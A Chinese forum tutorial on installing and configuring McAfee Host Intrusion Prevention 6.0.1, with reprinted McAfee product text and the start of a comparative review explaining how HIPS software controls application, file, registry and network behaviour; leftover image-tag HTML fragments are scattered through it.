俺补充一下(mejy):终端桌面安全大有n合一的趋势,这块以后会成为杀毒厂商/安全厂商竞争的有一个点.
---------------------------------------------
由于我也是刚使用,教程里面难免有疏漏和错误,望指正!
---------------------------------------------
产品下载
英文版:
http://files.myopera.com/TianShiYuEr/files/HIP601LEN.Zip
MD5:a839d9018870ba6b7a70edc84bea8732
补丁2:
http://files.myopera.com/TianShiYuEr/files/HIP601_P2_multi.Zip
MD5:d54ae2e658d5a906744e0016577ddcf5
俺再补充一下,可以去官方用 gant 为 1359001-NAI 可以在官方网站上下载到
一、安装篇
1.下载HIP601LEN.Zip和HIP601_P2_multi.Zip两个文件screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_a584cd353cd543b.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_a584cd353cd543b.jpg" border="0">
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_b250b5bad8bae6f.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_b250b5bad8bae6f.jpg" border="0">
2. 解压缩HIP601LEN.Zip,双击McAfeeHIP_ClientSetup.exe安装(会自动卸载McAfee Desktop Firewall 8.0/8.5,没有任何安装成功提示),确定开始菜单有Host Intrusion Prevention快捷方式则安装成功!如图screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_9fccb05b5b75814.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" pop="Click here to open new windowCTRL+Mouse wheel to zoom in/out" resized="true" src="http://bbs.hypost.cn/attachment/11_11178_9fccb05b5b75814.jpg" border="0" width="896">
3. 重启计算机到安全模式,解压缩HIP601_P2_multi.Zip,双击McAfeeHIP_ClientPatch_2_Multiple.exe 安装(运行即可,没有任何安装成功提示),确定C:\Program Files\McAfee\Host Intrusion Prevention\文件夹下部分文件日期更新到2006.11.7,则安装成功!如图screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_cf5b31468f31bad.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" pop="Click here to open new windowCTRL+Mouse wheel to zoom in/out" resized="true" src="http://bbs.hypost.cn/attachment/11_11178_cf5b31468f31bad.jpg" border="0" width="896">
4.重启计算机到正常模式,从开始菜单中打开Host Intrusion Prevention,如图screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_407c9cf78277d40.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_407c9cf78277d40.jpg" border="0">
---------------------------------------------
二、设置篇
1.解锁用户界面
由于Host Intrusion Prevention默认安装后是“锁定用户界面”的,任何设置选项都显示为灰色,如上图;所以咱们先得“解锁用户界面”
菜单栏选择“Task--Unlock User Interface”单击后screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_f562cf9924e23b6.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_f562cf9924e23b6.jpg" border="0">
出现下图screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_3f40b3112178a4c.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_3f40b3112178a4c.jpg" border="0">
密码留空,选择“Administrator password”点击“ok”screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_06e0a47e8e13034.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_06e0a47e8e13034.jpg" border="0">
出现下图,所有设置选项恢复正常screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_4a954636ab6b0b8.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_4a954636ab6b0b8.jpg" border="0">
2.设置IPS Policyscreen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_927fc5a8cb71a4e.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_927fc5a8cb71a4e.jpg" border="0">
3.设置Firewall Policy(建议如图,其实就是McAfee Desktop Firewall 8.0/8.5里面的学习模式^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_376d8f504161dc9.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_376d8f504161dc9.jpg" border="0">
4.设置Application Policy(建议如图)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_cd8d7d8cf7f4e3c.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_cd8d7d8cf7f4e3c.jpg" border="0">
5.Blocked Hosts(攻击记录,不用管^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_ea117b9fb29ddde.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_ea117b9fb29ddde.jpg" border="0">
6.Application Protection List(ms是个简单的任务管理器,不用管)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_210e5987e7eac8a.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_210e5987e7eac8a.jpg" border="0">
7.Activite Log(活动记录,根据喜好自己随便设^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_c400d115269ea87.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_c400d115269ea87.jpg" border="0">
---------------------------------------------
三、其他设置
(都比较简单,只贴图了^_^)
Editscreen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_e5c655bbe4da919.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_e5c655bbe4da919.jpg" border="0">
建议勾上Show Tray Icon(系统托盘图标,还是显示出来吧^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_969133758d937e2.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_969133758d937e2.jpg" border="0">
系统托盘图标screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_ab82f046ee98f3f.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_ab82f046ee98f3f.jpg" border="0">
右键单击后screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_3bc8f6d3ce67de1.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_3bc8f6d3ce67de1.jpg" border="0">
View(和二、重复,贴个图就算了^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_9b4cf2669ec78d7.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_9b4cf2669ec78d7.jpg" border="0">
Helpscreen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_7a804f135ce69f5.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_7a804f135ce69f5.jpg" border="0">
Aboutscreen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_506f1f887c32355.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_506f1f887c32355.jpg" border="0">
TroubleShooting Option(我觉得没用,不用管^_^)screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_efface9ded2c306.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_efface9ded2c306.jpg" border="0">
控制面板screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://bbs.hypost.cn/attachment/11_11178_aa5405d5b88d25b.jpg');}" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://bbs.hypost.cn/attachment/11_11178_aa5405d5b88d25b.jpg" border="0">
---------------------------------------------
官方文档转载:
---------------------------------------------
面向服务器的 McAfee Host Intrusion Prevention
---------------------------------------------
使您的服务器的正常运行时间最大化。为重要资产提供安全保护。 保持您的业务正常运营。
您 的企业服务器对于业务运营至关重要。您的企业赖以生存的绝大部分重要信息资产都保存在企业服务器中。所以千万不要让您的服务器发生故障或成为身份信息窃取 行为和企业间谍活动的牺牲品。借助 McAfee Host Intrusion Prevention,您就可以获得多层保护,从而确保您的服务器的安全和正常运转。
---------------------------------------------
优势:
针对您服务器的快速而全面的防护策略
包含活动规则、签名分析和防火墙防护的三层防护体系可以防止网络入侵、保护资产并维持服务器正常运行;甚至保护您的服务器免受未知的零时间攻击
提供全球范围内的服务器保护
McAfee Host Intrusion Prevention 是集中管理并且可扩展的,因此您可以在您的整个企业部署该解决方案,以实现拥有多语言支持的全面的全局防护
利用具有优先级的补丁管理拦截各类威胁
使用强大的 McAfee Host Intrusion Prevention 抵御新的漏洞和攻击的威胁,使客户有更多时间研究、测试和部署补丁程序
降低管理成本,简化管理流程
降低为系统安装补丁程序的频率和紧急度;借助集中、简化的管理还可以降低系统维护成本
---------------------------------------------
功能:
Web 服务器和数据库服务器防护
通过使用独特的 McAfee Host Intrusion Prevention 防护技术,保护 Web 服务器和数据库服务器免受诸如目录遍历和 SQL 注入式攻击的侵扰
漏洞防护
针对特定漏洞进行自动安全内容更新;识别未知攻击,并阻止这些攻击的实施;安全内容更新不需要重新启动系统
高级应用程序防护
McAfee Host Intrusion Prevention 为应用程序提供了“保护层”,防止其与其他应用程序进行通信,这样就可以避免应用程序被任何形式的攻击所利用
阻止缓冲区溢出攻击
McAfee Host Intrusion Prevention 采用获得专利的主机入侵防护技术来阻止缓冲区溢出攻击,缓冲区溢出攻击是攻击服务器和桌面机的最常用的方法之一
防火墙保护
防火墙能够对服务器上所有进出的网络流量进行监控,还能为安装在服务器上的各种应用程序提供监控和保护
---------------------------------------------
说明:
您的服务器以及其中保存的重要资产,正时刻受到攻击的威胁。 蠕虫、间谍软件、病毒、漏洞以及其他各种威胁会对您的数据造成严重威胁,并使您的服务器陷入瘫痪,这可能会给企业带来灾难性的后果。
McAfee® Host Intrusion Prevention 可以监控并拦截此类恶意攻击活动。 Host Intrusion Prevention 可以保持服务器正常运转,并为应用程序、客户信息以及数据库等企业资产提供保护。 它运用多种成熟的防护方法,包括系统防火墙、签名分析和活动分析。
借助自动签名更新和零时间防护,您可以获得高级的漏洞防护功能。 您将不必频繁而紧急地为系统安装补丁程序。 您还会发现,遵从法规变得更加轻松。
独 立产品具有复杂的非集成管理平台,使企业难以部署抵御当前混合威胁所需的全面防护。 Host Intrusion Prevention 整合到了您现有的 McAfee® ePolicy Orchestrator® 管理平台,以实现准确、可扩展且简单易用的高级服务器防护。
---------------------------------------------
适用于桌面机的 McAfee Host Intrusion Prevention
---------------------------------------------
实施策略、设置防火墙规则并保证桌面机的安全
您 如何管理规模庞大的跨国企业中桌面机和膝上型电脑的安全和连接策略?正如任何安全专家都会告诉您的,桌面机的安全防护极具挑战。McAfee Host Intrusion Prevention 为您提供了范围广泛的防护战略,它包括三个部分:桌面机防火墙防护、活动规则以及签名分析,所有这些均可通过一个中央控制台进行管理。
---------------------------------------------
优势:
为您的桌面机提供快速而全面的防护
包 含活动规则、签名分析和防火墙防护的三层防护体系可以防止网络入侵、保护资产和确保您的桌面机及膝上型电脑的安全。 McAfee Host Intrusion Prevention 甚至可以保护您的桌面机系统免受未知(零时间)攻击。 这样无论身处何处,您都可以通过单一中央控制台轻松地管理所有桌面机。
提供全球范围内的企业桌面机保护
McAfee Host Intrusion Prevention 是集中管理并且可扩展的,因此您可以在您的整个企业部署该解决方案,以实现拥有多语言支持的全局性全面防护
利用具有优先级的补丁管理拦截各类威胁
使用强大的 McAfee Host Intrusion Prevention 抵御新的漏洞和攻击的威胁,使客户有更多时间研究、测试和部署补丁程序
降低管理成本,简化管理流程
无需频繁而紧急地为系统安装补丁程序;借助集中、简化的管理还可以降低系统维护成本
---------------------------------------------
功能:
漏洞防护
自动安全内容更新针对特定漏洞;能够识别未知攻击,并阻止这些攻击的实施;安全内容更新不需要重新启动系统
抵御缓冲区溢出攻击
McAfee Host Intrusion Prevention 采用获得专利的主机入侵防护技术来阻止缓冲溢出攻击,缓冲溢出攻击是攻击桌面机的最常用的方法之一
阻止可移动的 USB 存储设备
通过禁用可移动的 USB 介质,可以拦截不经意间加载到桌面机的病毒或蠕虫,降低数据被盗风险,实施企业锁定策略
桌面机防火墙保护
通过桌面机防火墙,您可以根据系统连接到网络的方式采用不同的防火墙策略;您还可以在未遵从安全规范的系统试图连接到网络时隔离该类系统并拦截系统端口
先进的应用程序防护
McAfee Host Intrusion Prevention 为应用程序提供了“保护层”,防止其与其他应用程序进行通信,这样就可以避免应用程序被任何形式的攻击所利用
---------------------------------------------
说明:
对 员工日常使用的桌面机和膝上型电脑进行安全管理和连接控制确实是一个 IT 难题。 员工可以不经意间将蠕虫、间谍软件或其他威胁通过桌面机或膝上型电脑带入您的网络。 另一方面,桌面机常常会成为各类攻击(如缓冲溢出攻击)的目标。 这种攻击会危害您的数据,使员工处于危险境地,同时导致工作效率降低。
McAfee® Host Intrusion Prevention 可以对这类恶意活动进行监控和拦截,并通过多种成熟的方法(如系统防火墙、签名分析和活动分析)更轻松地保持桌面机的安全。 而您只要通过中央控制台即可对这些进行管理。
借 助自动签名更新和零时间防护,您可以获得高级的漏洞防护功能。 您将不必频繁而紧急地为系统安装补丁程序。 您还会发现,遵从法规变得更加轻松。 借助您的桌面机中的单一主机入侵防护代理,您可以轻松部署、配置和管理 Host Intrusion Prevention。
我们的防 火墙为您的桌面机和膝上型电脑提供前瞻性的防护和控制,以对抗新的威胁,并且能帮助您实施各种策略。 借助 Host Intrusion Prevention,您可以根据各系统与您网络的连接方式来定义防火墙规则。 系统确定出现网络问题后,隔离模式会检查计算机是否久未更新或未遵从策略。 如果的确如此,就会限制网络访问直至解决安全问题。
独立产品 具有复杂的非集成管理平台,使企业难以部署抵御当前混合威胁所需的全面防护。 Host Intrusion Prevention 整合到了您现有的 McAfee ePolicy Orchestrator 管理平台,以实现准确、可扩展且简单易用的高级桌面机防护。
---------------------------------------------
系统要求:
请注意:以下列出的仅为最低系统要求。 实际需求视客户的具体环境而定,可能有所不同。
系统要求
Microsoft® Windows®(英语、法语、德语、西班牙语、日语、朝鲜语、繁体中文)
Microsoft Windows NT 4.0 Server (SP6a)
Microsoft Windows NT 4.0 Enterprise Server (SP6a)
Microsoft Windows 2000 Professional(到 SP4)
Microsoft Windows 2000 Server and Advanced Server(到 SP4)
Microsoft Windows XP(到 SP2)
Microsoft Windows 2003 Server(到 SP1)
支持的 Web 服务器平台:IIS 4.0、5.0 和 6.0(Microsoft Windows)
支持的数据库服务器平台:Microsoft SQL Server 2000 (Microsoft Windows) SP3a、SP4
注意:关于 Solaris™、HP-UX 和 Linux™,请与授权的 McAfee 经销合作伙伴或您的 McAfee 客户代表联系
主流HIPS产品深度测试
HIPS是英文“Host Intrusion Prevent System”的缩写,我们通常翻译为“主机入侵防御系统”。
随着网络的不断普及,信息的传播速度越来越快,软件系统也越来越复杂,随之而来的是主机安全问题日益严峻,我们一旦接入互联网就会面临黑客的扫描、网页恶 意代码、病毒、间谍软件、木马、流氓软件等各种威胁。为了解决这些问题,安全厂家先后研发出了个人防火墙、防病毒等安全产品,但是在2006年,这些产品 受到了前所未有的挑战:
首先,传统的个人防火墙不再有效。传统的个人防火墙,如天网个人防火墙等,可以对经过本机的网络数据流量进行控制,做到不允许外部计算机扫描本机,同时本 机只有指定的应用程序可以外出访问网络,高级些的防火墙还可以对外出访问的目标地址、端口和协议进行过滤。但是现在网络威胁已经远远不是端机的主要威胁, 黑客们更习惯在你访问某个网站时通过浏览器悄悄地下载一个恶意软件,然后想办法让它运行,进而盗走敏感信息,或者弹出广告窗口。在这种趋势下,仅简单对网 络访问进行控制而不对应用程序行为进行控制的传统个人防火墙将难以应对。
其次,基于特征码扫描技术的防病毒产品面临巨大挑战。2007年在美国旧金山举行的RSA Conference大会上,专家纷纷表示,“越来越复杂的恶意软件不断繁衍,传统的、以签名(特征码)为基础的安全软件对于病毒和蠕虫的阻挡能力正受到 越来越多的质疑。”“仅2007年一年就会新出现至少20万种病毒及变种,签名技术正在网络黑客的攻击下摇摇欲坠。同时,反病毒软件公司的病毒库都平均落 后于恶意软件两个月。”在国内,熊猫烧香病毒的肆虐也说明了这样一个问题,病毒已经和系统漏洞、流氓软件等进行了捆绑,变种更新和传播的速度远超想象,在 没有新的特征库更新前防病毒软件对未知病毒束手无策。
由于上述种种原因,安全厂家开始寻找新的解决方案,以主动防御为思想的主机入侵防御系统日渐成熟,在今天,可能只有HIPS才是能解决端机上复杂安全问题的希望。
HIPS软件以进程为核心,可以对进程所产生的行为,如运行、访问网络、访问注册表、访问文件、注册驱动、进程注入、组件调用等进行监控,并且可以向你发 送行为报告,如果你阻止了某个异常行为,那么它将无法执行此行为。同时,HIPS还可以通过类似的监控手段对文件、注册表、网络等资源进行保护,防止未授 权进程对其读写或扫描。举个例子,当你在上网的时候不小心下载了一个恶意软件,而这个恶意软件在试图进行执行、操作注册表获得下次启动入口、访问网络试图 带出数据时,HIPS软件会根据您的策略弹出对话框询问或直接阻止这些行为,使得系统免受威胁。由于HIPS这种可以针对行为进行控制的特性,使得 HIPS可以防御未知恶意软件,你所要做的仅仅是判断未知应用程序的行为是否正常,在发现异常时及时阻止。
用一句大家都很熟悉的话来说:“病毒变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。HIPS是以后系统安全发展的一种趋势,只要你有足够的专业水平,你可以只用HIPS而不需杀毒软件。”
本测试所涉及的HIPS是指运行在Windows 2000/xp/2003下的主机入侵防御系统类软件。
为什么要进行本次测试
HIPS在信息安全市场上是个新概念,在2006年无疑是主机安全领域最大的明星。HIPS软件在国外已经逐步进入规范化发展的轨道,国人所熟知的 SSM、SNS都是这个领域的先驱。随着一些国际大公司相继推出HIPS产品,我们已经看到了未来主机安全产品一体化、主动安全产品替代传统被动安全产品 这一发展趋势,HIPS的出现意味着变革已经悄然到来,这对饱受恶意软件折磨的你来讲将是一场精彩的盛宴。
反观国内HIPS市场,我们的信息安全厂商似乎慢了一步。三大防病毒软件提供商:瑞星、金山和江民截至目前尚未推出任何此类概念产品,有些厂商提出的主动 防御概念也与此大相径庭。中网、微点、EQ恐怕是目前国内在搜索引擎上能找到的仅有3家HIPS产品提供商,它们提供的软件在功能上也存在商榷。
笔者是HIPS软件的热衷用户,对国内外的几家产品均进行过安装和测试,特别是在测试过程中发现在目前的HIPS产品中良莠不齐,有些产品功能强大,有些 产品安全性好,有些产品使用方便。因此,笔者将近半年来的测试工作整理成本报告,希望能对正在选择HIPS软件的朋友提供一些帮助,愿国内HIPS用户群 越来越大,国产HIPS软件越来越强。
测试产品的选择
笔者曾使用测试过十余款HIPS软件,通过与身边同样对HIPS感兴趣的朋友交流,最终选择了9款具有代表性的,使用率相对较高的产品进行测试,其中国外6款,国内3款,具体见下表:
- Safe’n’Sec Personal(SNS)
- System Safety Monitor(SSM)
- CA Host-Based Intrusion Prevention System(CA HIPS
- ProSecurity
- Ghost Security Suit(GSS)
- Winpooch
- 中网S3主机安全系统
- 微点主动防御软件
- EQSecure
测试范围
由于本次测试定位在深度测试,本人希望能将所有10款HIPS软件的方方面面尽可能详细地展示出来,因此同时从HIPS四大核心功能(应用程序控制AD、 文件保护FD、注册表保护RD、网络访问控制ND)、自身安全强度、易用性以及实际使用环境等角度制定了测试计划,其测试对象如下:
安装及运行类?
- 安装速度及容易度、磁盘容量需求及内存需求
- 运行效率
- 产品是否易于使用
- 系统稳定性
应用程序控制功能,也就是我们通常描述HIPS软件时所提到的AD(Application Defend)功能,是HIPS软件最重要也是最基本的功能。在Windows系统上,应用程序的行为是造成Windows系统威胁的根本原因。我们的计 算机感染病毒、被植入木马等问题的核心都是应用程序被执行且产生了恶意行为。在病毒、木马、流氓软件已经没有明显界限的今天,黑客们越来越重视对应用程序 行为的研究,它们使用诸如进程隐藏、Rootkit、注入、进程伪装等手段“保护”恶意软件的行为不会被用户发现,进而偷偷地进行破坏,弹出窗口或带出敏 感数据,这些问题是目前Windows系统上所面临的主要问题。
应用程序控制功能需要对应用程序可能对操作系统带来危害的主要行为进行控制,使用户在使用HIPS后可以及时发现这些行为并及时阻止。高级些的HIPS还需要对应用程序的执行进行控制,对可执行文件的完整性进行校验。
- 已知程序运行控制
- 未知程序运行控制
- 已更改程序运行控制
- 自启动程序控制
- 创建子进程控制
- 打开进程控制
- DLL注入控制
- 打开网络连接控制
- OLE对象控制
文件控制功能就是通常所说的FD(File Defend)功能。应用程序以文件方式存储在硬盘上,恶意程序可以通过以下两种方式获得执行权限:第一种是写入到“开始”等拥有特殊功能的文件夹,或在 磁盘根目录生成autorun.ini文件执行,第二种是重写某些特殊文件,如iexplorer.exe执行。恶意程序也可以将自身写入Windows 或system32等特殊目录以逃避检查。
写文件往往是恶意程序感染才作系统的第一步,因此HIPS需要对操作系统的文件读写进行控制。这种控制包括两个方面:
首先是对未知应用程序试图进行文件读写操作的行为进行控制。通过这类控制可以控制恶意程序直接在操作系统中释放恶意文件,很多黑客程序在开始工作时都会释 放出一个恶意文件,如“熊猫烧香”会释放spoclsv.exe,“灰鸽子”会释放hacker.com.ini。
其次是对关键路径进行保护。未知程序向Windows、Windows\system32、Documents and Settings等目录写文件都是非常危险的动作。当使用IE上网时,恶意网站会通过一段脚本造成IE缓冲区溢出,随后向指定路径写文件,这时在HIPS 看来写文件的进程是IE,而IE是具有写文件权限的进程。因此在这种情况下需要对关键路径提供保护,禁止任何进程写关键路径。
优秀的HIPS软件应同时具备以上两种控制手段,仅完成一种是不完备的,一个没有任何文件控制(FD)功能的HIPS产品是存在很大漏洞的。
注册表控制类 RD
注册表控制类通常被成为HIPS的RD(Registry Defend)功能。注册表是应用程序运行的重要入口,在Windows系统中预留了类似于Run、RunOnce等特殊注册表项,用以在操作系统启动时 自动运行相应的应用程序,此外注册表还决定了应用程序的引导方式,如作为驱动引导、作为服务引导还是作为一般应用程序引导,引导顺序也可以指定。
黑客程序往往会利用某些特殊的注册表项,使得自身可以不需人为干预而自动运行,高级的黑客程序还可以将自身注册为操作系统驱动或服务,以逃避防病毒软件查杀。
类似于文件保护功能,HIPS需要对操作系统的注册表读写进行控制,这种控制包括两个方面:
首先是未知应用程序读写注册表的行为,HIPS软件应该可以及时进行控制,木马通常会在运行后将自身写入自动运行键以开启后门。
其次是对关键注册表项进行保护,防止恶意软件通过正常应用程序以授权权限写关键注册表项。
优秀的HIPS软件最好能同时具备以上两种控制手段,仅完成一种是不完备的,一个没有任何注册表控制(RD)功能的HIPS产品是存在很大漏洞的。
网络控制类 ND
作为HIPS产品的功能描述,网络控制ND(Network Defend)在国内并没有被过多提及,而实际上ND功能是HIPS软件最重要的功能之一。
